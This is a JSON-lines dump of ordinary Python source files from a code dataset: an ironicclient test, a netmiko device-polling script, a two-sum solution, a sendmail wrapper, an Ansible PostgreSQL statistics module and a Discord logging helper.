test_chassis_update_without_arguments(self):\n \"\"\"Test steps:\n\n 1) create chassis\n 2) check that chassis-update command without arguments\n triggers an exception\n \"\"\"\n ex_text = r'chassis-update: error: too few arguments'\n\n six.assertRaisesRegex(self, exceptions.CommandFailed,\n ex_text,\n self.update_chassis,\n chassis_id='',\n operation='')\n\n def test_chassis_update_with_incorrect_chassis_uuid(self):\n \"\"\"Test steps:\n\n 1) create chassis\n 2) check that chassis-update command with incorrect arguments\n triggers an exception\n \"\"\"\n uuid = data_utils.rand_uuid()\n ex_text = r'chassis-update: error: too few arguments'\n\n six.assertRaisesRegex(self,\n exceptions.CommandFailed,\n ex_text,\n self.update_chassis,\n chassis_id='{0}'.format(uuid),\n operation='')\n","sub_path":"ironicclient/tests/functional/test_chassis.py","file_name":"test_chassis.py","file_ext":"py","file_size_in_byte":7603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"617207063","text":"from pprint import pprint\nfrom datetime import datetime\nimport logging\nimport yaml\nimport time\nimport re\nfrom itertools import repeat\nfrom netmiko import (\n ConnectHandler,\n NetmikoTimeoutException,\n NetmikoAuthenticationException,\n)\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\nimport random\n\n\nlogging.getLogger(\"paramiko\").setLevel(logging.WARNING)\nlogging.getLogger(\"netmiko\").setLevel(logging.WARNING)\n\nlogging.basicConfig(\n format='%(threadName)s %(name)s %(levelname)s: %(message)s',\n level=logging.INFO)\n\n\ndef send_show_command(device, show):\n start_msg = \"===> {} Connection: {}\"\n received_msg = \"<=== {} Received: {}\"\n ip = device[\"host\"]\n logging.info(start_msg.format(datetime.now().time(), ip))\n\n try:\n with ConnectHandler(**device) as ssh:\n time.sleep(random.random()*10)\n ssh.enable()\n result = ssh.send_command(show)\n logging.info(received_msg.format(datetime.now().time(), ip))\n return ip, result\n except (NetmikoTimeoutException, NetmikoAuthenticationException) as error:\n logging.warning(error)\n\n\ndef send_command_to_devices(devices, command, parse_command_func):\n result_dict = {}\n with ThreadPoolExecutor(max_workers=3) as executor:\n future_list = []\n for device in devices:\n f = executor.submit(\n send_show_command, device, show=command\n )\n future_list.append(f)\n for future in as_completed(future_list):\n ip, out = future.result()\n result_dict[ip] = parse_command_func(out)\n return result_dict\n\n\ndef parse_sh_ip_int_br(output):\n regex = r\"(\\S+) +([\\d.]+) +\"\n intf_ip_dict = {}\n for match in re.finditer(regex, output):\n intf, ip = match.groups()\n intf_ip_dict[intf] = ip\n return intf_ip_dict\n\n\nif __name__ == \"__main__\":\n with open(\"devices.yaml\") as f:\n devices = yaml.safe_load(f)\n result_dict = send_command_to_devices(\n devices, \"sh ip int br\", parse_sh_ip_int_br\n )\n pprint(result_dict)\n","sub_path":"examples/20_concurrent_connections/netmiko_threads_submit_and_parse.py","file_name":"netmiko_threads_submit_and_parse.py","file_ext":"py","file_size_in_byte":2089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"545780350","text":"class Solution():\n def twoSum(delf, nums, target):\n seen = {}\n for i, v in enumerate(nums):\n remaining = target - v\n if remaining in seen:\n return [seen[remaining], i]\n else:\n seen[v] = i\n return []\n\nif __name__ == \"__main__\":\n a = [4, 5, 7, 6, 2, 9]\n solution = Solution()\n s = []\n s.append(solution.twoSum(a,11))\n print(s)\n\n# extention:How to code if there exist more than one case that match the target?","sub_path":"LeetCode/0001. Two Sum.py","file_name":"0001. Two Sum.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"393943708","text":"from os import listdir\nimport sys\n\nyml_file = '_data/gallery.yml'\ncut_off = open(yml_file, 'w')\nappend = open(yml_file, 'a')\ncount = 0\nfor f in listdir('gallery/'):\n\tif count == 0:\n\t\tif f != '.DS_Store':\n\t\t\tcut_off.write('- name: ' + f + '\\n')\n\t\t\tcount += 1\n\telse:\n\t\tappend.write('- name: ' + f + '\\n')","sub_path":"imgnames.py","file_name":"imgnames.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"257409579","text":"#/usr/local/bin/python\n\n# sendmail.py\n#\n# a simple interface for injecting mail to the local mail delivery\n# agent\n#\n\nimport os,string,re\nimport MaildirQueue\nimport log\n\nDISABLED=0\n\ndef delayed_queue(BOUNCE_RETURN_ADDRESS, TO_ADDRESS_LIST, BODY):\n mq = MaildirQueue.MaildirQueue(\"/neo/data/queue\")\n fn = mq.tmpfile()\n fp = open(fn, \"w\")\n fp.write(\"%s\\n-##SEP##-\\n\" % BOUNCE_RETURN_ADDRESS)\n fp.write(\"%s\\n-##SEP##-\\n\" % string.join(TO_ADDRESS_LIST, \"\\n\"))\n fp.write(BODY)\n fp.close()\n mq.enqueue(fn, \"new\")\n\nVALID_CHARS = string.ascii_letters + string.digits + \"@.+-_,:\"\nVALID_CHARS_RE = \"([^-@\\+\\._,:A-Za-z0-9])\"\n\ndef shell_escape(s):\n global VALID_CHARS, VALID_CHARS_RE\n # This should work.. but it doesn't\n #invalid_re = re.compile(VALID_CHARS_RE)\n #return invalid_re.sub(r'\\\\1', s)\n\n o = []\n for x in range(len(s)):\n if s[x] not in VALID_CHARS:\n o.append(\"\\\\%s\" % s[x])\n else:\n o.append(s[x])\n return ''.join(o)\n\n\ndef sendmail(BOUNCE_RETURN_ADDRESS,TO_ADDRESS_LIST,BODY):\n global DISABLED\n if DISABLED:\n log (\"Not sending to %s\" % repr(TO_ADDRESS_LIST))\n return\n try:\n mod_to_list = []\n for address in TO_ADDRESS_LIST:\n mod_to_list.append(shell_escape(address))\n \n cmd = \"/usr/lib/sendmail -oi -f'%s' -- %s\" % (BOUNCE_RETURN_ADDRESS,\n string.join(mod_to_list, ' '))\n fp = os.popen(cmd, \"w\", 16384)\n fp.write(BODY)\n r = fp.close()\n if not r: return\n if os.WIFEXITED(r):\n if os.WEXITSTATUS(r):\n raise \"cmd '%s' returned %d\" % (cmd, os.WEXITSTATUS(r))\n elif os.WIFSIGNALED(r):\n raise \"cmd '%s' ended on signal %d\" % (cmd, os.WTERMSIG(r))\n elif os.WIFSTOPPED(r):\n raise \"cmd '%s' ended on signal %d\" % (cmd, os.WSTOPSIG(r))\n except IOError:\n delayed_queue(BOUNCE_RETURN_ADDRESS, TO_ADDRESS_LIST, BODY)\n except:\n import handle_error\n handle_error.handleException(\"Unable to send message\")\n delayed_queue(BOUNCE_RETURN_ADDRESS, TO_ADDRESS_LIST, BODY)\n","sub_path":"pysrc/base/sendmail.py","file_name":"sendmail.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"569256586","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# Copyright: (c) 2020, Andrew Klychkov (@Andersson007) \n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n\nfrom __future__ import absolute_import, division, print_function\n__metaclass__ = type\n\nDOCUMENTATION = r'''\n---\nmodule: postgresql_user_obj_stat_info\nshort_description: Gather statistics about PostgreSQL user objects\ndescription:\n- Gathers statistics about PostgreSQL user objects.\nversion_added: '0.2.0'\noptions:\n filter:\n description:\n - Limit the collected information by comma separated string or YAML list.\n - Allowable values are C(functions), C(indexes), C(tables).\n - By default, collects all subsets.\n - Unsupported values are ignored.\n type: list\n elements: str\n schema:\n description:\n - Restrict the output by certain schema.\n type: str\n db:\n description:\n - Name of database to connect.\n type: str\n aliases:\n - login_db\n session_role:\n description:\n - Switch to session_role after connecting. The specified session_role must\n be a role that the current login_user is a member of.\n - Permissions checking for SQL commands is carried out as though\n the session_role were the one that had logged in originally.\n type: str\n trust_input:\n description:\n - If C(no), check the value of I(session_role) is potentially dangerous.\n - It makes sense to use C(no) only when SQL injections via I(session_role) are possible.\n type: bool\n default: yes\n version_added: '0.2.0'\n\nnotes:\n- C(size) and C(total_size) returned values are presented in bytes.\n- For tracking function statistics the PostgreSQL C(track_functions) parameter must be enabled.\n See U(https://www.postgresql.org/docs/current/runtime-config-statistics.html) for more information.\n- Supports C(check_mode).\nseealso:\n- module: community.postgresql.postgresql_info\n- module: community.postgresql.postgresql_ping\n- name: PostgreSQL statistics collector reference\n description: Complete reference of the PostgreSQL statistics collector documentation.\n link: https://www.postgresql.org/docs/current/monitoring-stats.html\nauthor:\n- Andrew Klychkov (@Andersson007)\n- Thomas O'Donnell (@andytom)\nextends_documentation_fragment:\n- community.postgresql.postgres\n\n'''\n\nEXAMPLES = r'''\n- name: Collect information about all supported user objects of the acme database\n community.postgresql.postgresql_user_obj_stat_info:\n db: acme\n\n- name: Collect information about all supported user objects in the custom schema of the acme database\n community.postgresql.postgresql_user_obj_stat_info:\n db: acme\n schema: custom\n\n- name: Collect information about user tables and indexes in the acme database\n community.postgresql.postgresql_user_obj_stat_info:\n db: acme\n filter: tables, indexes\n'''\n\nRETURN = r'''\nindexes:\n description: User index statistics.\n returned: always\n type: dict\n sample: {\"public\": {\"test_id_idx\": {\"idx_scan\": 0, \"idx_tup_fetch\": 0, \"idx_tup_read\": 0, \"relname\": \"test\", \"size\": 8192, ...}}}\ntables:\n description: User table statistics.\n returned: always\n type: dict\n sample: {\"public\": {\"test\": {\"analyze_count\": 3, \"n_dead_tup\": 0, \"n_live_tup\": 0, \"seq_scan\": 2, \"size\": 0, \"total_size\": 8192, ...}}}\nfunctions:\n description: User function statistics.\n returned: always\n type: dict\n sample: {\"public\": {\"inc\": {\"calls\": 1, \"funcid\": 26722, \"self_time\": 0.23, \"total_time\": 0.23}}}\n'''\n\ntry:\n from psycopg2.extras import DictCursor\nexcept ImportError:\n # psycopg2 is checked by connect_to_db()\n # from ansible.module_utils.postgres\n pass\n\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible_collections.community.postgresql.plugins.module_utils.database import (\n check_input,\n)\nfrom ansible_collections.community.postgresql.plugins.module_utils.postgres import (\n connect_to_db,\n exec_sql,\n get_conn_params,\n postgres_common_argument_spec,\n)\nfrom ansible.module_utils.six import iteritems\n\n\n# ===========================================\n# PostgreSQL module specific support methods.\n#\n\n\nclass PgUserObjStatInfo():\n \"\"\"Class to collect information about PostgreSQL user objects.\n\n Args:\n module (AnsibleModule): Object of AnsibleModule class.\n cursor (cursor): Cursor object of psycopg2 library to work with PostgreSQL.\n\n Attributes:\n module (AnsibleModule): Object of AnsibleModule class.\n cursor (cursor): Cursor object of psycopg2 library to work with PostgreSQL.\n executed_queries (list): List of executed queries.\n info (dict): Statistics dictionary.\n obj_func_mapping (dict): Mapping of object types to corresponding functions.\n schema (str): Name of a schema to restrict stat collecting.\n \"\"\"\n\n def __init__(self, module, cursor):\n self.module = module\n self.cursor = cursor\n self.info = {\n 'functions': {},\n 'indexes': {},\n 'tables': {},\n }\n self.obj_func_mapping = {\n 'functions': self.get_func_stat,\n 'indexes': self.get_idx_stat,\n 'tables': self.get_tbl_stat,\n }\n self.schema = None\n\n def collect(self, filter_=None, schema=None):\n \"\"\"Collect statistics information of user objects.\n\n Kwargs:\n filter_ (list): List of subsets which need to be collected.\n schema (str): Restrict stat collecting by certain schema.\n\n Returns:\n ``self.info``.\n \"\"\"\n if schema:\n self.set_schema(schema)\n\n if filter_:\n for obj_type in filter_:\n obj_type = obj_type.strip()\n obj_func = self.obj_func_mapping.get(obj_type)\n\n if obj_func is not None:\n obj_func()\n else:\n self.module.warn(\"Unknown filter option '%s'\" % obj_type)\n\n else:\n for obj_func in self.obj_func_mapping.values():\n obj_func()\n\n return self.info\n\n def get_func_stat(self):\n \"\"\"Get function statistics and fill out self.info dictionary.\"\"\"\n query = \"SELECT * FROM pg_stat_user_functions\"\n if self.schema:\n query = \"SELECT * FROM pg_stat_user_functions WHERE schemaname = %s\"\n\n result = exec_sql(self, query, query_params=(self.schema,),\n add_to_executed=False)\n\n if not result:\n return\n\n self.__fill_out_info(result,\n info_key='functions',\n schema_key='schemaname',\n name_key='funcname')\n\n def get_idx_stat(self):\n \"\"\"Get index statistics and fill out self.info dictionary.\"\"\"\n query = \"SELECT * FROM pg_stat_user_indexes\"\n if self.schema:\n query = \"SELECT * FROM pg_stat_user_indexes WHERE schemaname = %s\"\n\n result = exec_sql(self, query, query_params=(self.schema,),\n add_to_executed=False)\n\n if not result:\n return\n\n self.__fill_out_info(result,\n info_key='indexes',\n schema_key='schemaname',\n name_key='indexrelname')\n\n def get_tbl_stat(self):\n \"\"\"Get table statistics and fill out self.info dictionary.\"\"\"\n query = \"SELECT * FROM pg_stat_user_tables\"\n if self.schema:\n query = \"SELECT * FROM pg_stat_user_tables WHERE schemaname = %s\"\n\n result = exec_sql(self, query, query_params=(self.schema,),\n add_to_executed=False)\n\n if not result:\n return\n\n self.__fill_out_info(result,\n info_key='tables',\n schema_key='schemaname',\n name_key='relname')\n\n def __fill_out_info(self, result, info_key=None, schema_key=None, name_key=None):\n # Convert result to list of dicts to handle it easier:\n result = [dict(row) for row in result]\n\n for elem in result:\n # Add schema name as a key if not presented:\n if not self.info[info_key].get(elem[schema_key]):\n self.info[info_key][elem[schema_key]] = {}\n\n # Add object name key as a subkey\n # (they must be uniq over a schema, so no need additional checks):\n self.info[info_key][elem[schema_key]][elem[name_key]] = {}\n\n # Add other other attributes to a certain index:\n for key, val in iteritems(elem):\n if key not in (schema_key, name_key):\n self.info[info_key][elem[schema_key]][elem[name_key]][key] = val\n\n if info_key in ('tables', 'indexes'):\n schemaname = elem[schema_key]\n if self.schema:\n schemaname = self.schema\n\n relname = '%s.%s' % (schemaname, elem[name_key])\n\n result = exec_sql(self, \"SELECT pg_relation_size (%s)\",\n query_params=(relname,),\n add_to_executed=False)\n\n self.info[info_key][elem[schema_key]][elem[name_key]]['size'] = result[0][0]\n\n if info_key == 'tables':\n result = exec_sql(self, \"SELECT pg_total_relation_size (%s)\",\n query_params=(relname,),\n add_to_executed=False)\n\n self.info[info_key][elem[schema_key]][elem[name_key]]['total_size'] = result[0][0]\n\n def set_schema(self, schema):\n \"\"\"If schema exists, sets self.schema, otherwise fails.\"\"\"\n query = (\"SELECT 1 FROM information_schema.schemata \"\n \"WHERE schema_name = %s\")\n result = exec_sql(self, query, query_params=(schema,),\n add_to_executed=False)\n\n if result and result[0][0]:\n self.schema = schema\n else:\n self.module.fail_json(msg=\"Schema '%s' does not exist\" % (schema))\n\n\n# ===========================================\n# Module execution.\n#\n\ndef main():\n argument_spec = postgres_common_argument_spec()\n argument_spec.update(\n db=dict(type='str', aliases=['login_db']),\n filter=dict(type='list', elements='str'),\n session_role=dict(type='str'),\n schema=dict(type='str'),\n trust_input=dict(type=\"bool\", default=True),\n )\n module = AnsibleModule(\n argument_spec=argument_spec,\n supports_check_mode=True,\n )\n\n filter_ = module.params[\"filter\"]\n schema = module.params[\"schema\"]\n\n if not module.params[\"trust_input\"]:\n check_input(module, module.params['session_role'])\n\n # Connect to DB and make cursor object:\n pg_conn_params = get_conn_params(module, module.params)\n # We don't need to commit anything, so, set it to False:\n db_connection = connect_to_db(module, pg_conn_params, autocommit=False)\n cursor = db_connection.cursor(cursor_factory=DictCursor)\n\n ############################\n # Create object and do work:\n pg_obj_info = PgUserObjStatInfo(module, cursor)\n\n info_dict = pg_obj_info.collect(filter_, schema)\n\n # Clean up:\n cursor.close()\n db_connection.close()\n\n # Return information:\n module.exit_json(**info_dict)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"intro-ansible/venv3/lib/python3.8/site-packages/ansible_collections/community/postgresql/plugins/modules/postgresql_user_obj_stat_info.py","file_name":"postgresql_user_obj_stat_info.py","file_ext":"py","file_size_in_byte":11424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"11426067","text":"import discord\nimport logging\nfrom datetime import datetime\n\n\ndef dateformat(dtime=None):\n \"\"\"Formats a date.\n\n Args:\n dtime: The datetime. If None, this will be the current time.\n \"\"\"\n if dtime is None:\n dtime = datetime.now()\n return dtime.strftime(\"%Y-%m-%d %H:%M:%S\")\n\n\ndef init_logging():\n logger = logging.getLogger(\"discord\")\n logger.setLevel(logging.INFO)\n handler = logging.FileHandler(filename=\"discord.log\", encoding=\"utf-8\",\n mode=\"w\")\n formatter = logging.Formatter(\"[%(asctime)s:%(levelname)s] %(message)s\")\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n\n\ndef log(msg):\n \"\"\"Logs a message.\n\n Args:\n msg: The message.\n \"\"\"\n logger = logging.getLogger(\"discord\")\n logger.info(msg)\n print(msg)\n\n\ndef create_embed(title, text, color, data=None):\n \"\"\"Creates an embed.\n\n Args:\n title: The title for the embed.\n text: The text for the embed.\n color: The color of the embed.\n data: Data entries for the embed.\n Returns:\n The created embed.\n \"\"\"\n if data is None:\n data = {}\n embed = discord.Embed(title=title, description=text, color=color)\n for key in data:\n embed.add_field(name=key, value=data[key])\n return embed\n","sub_path":"misc/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}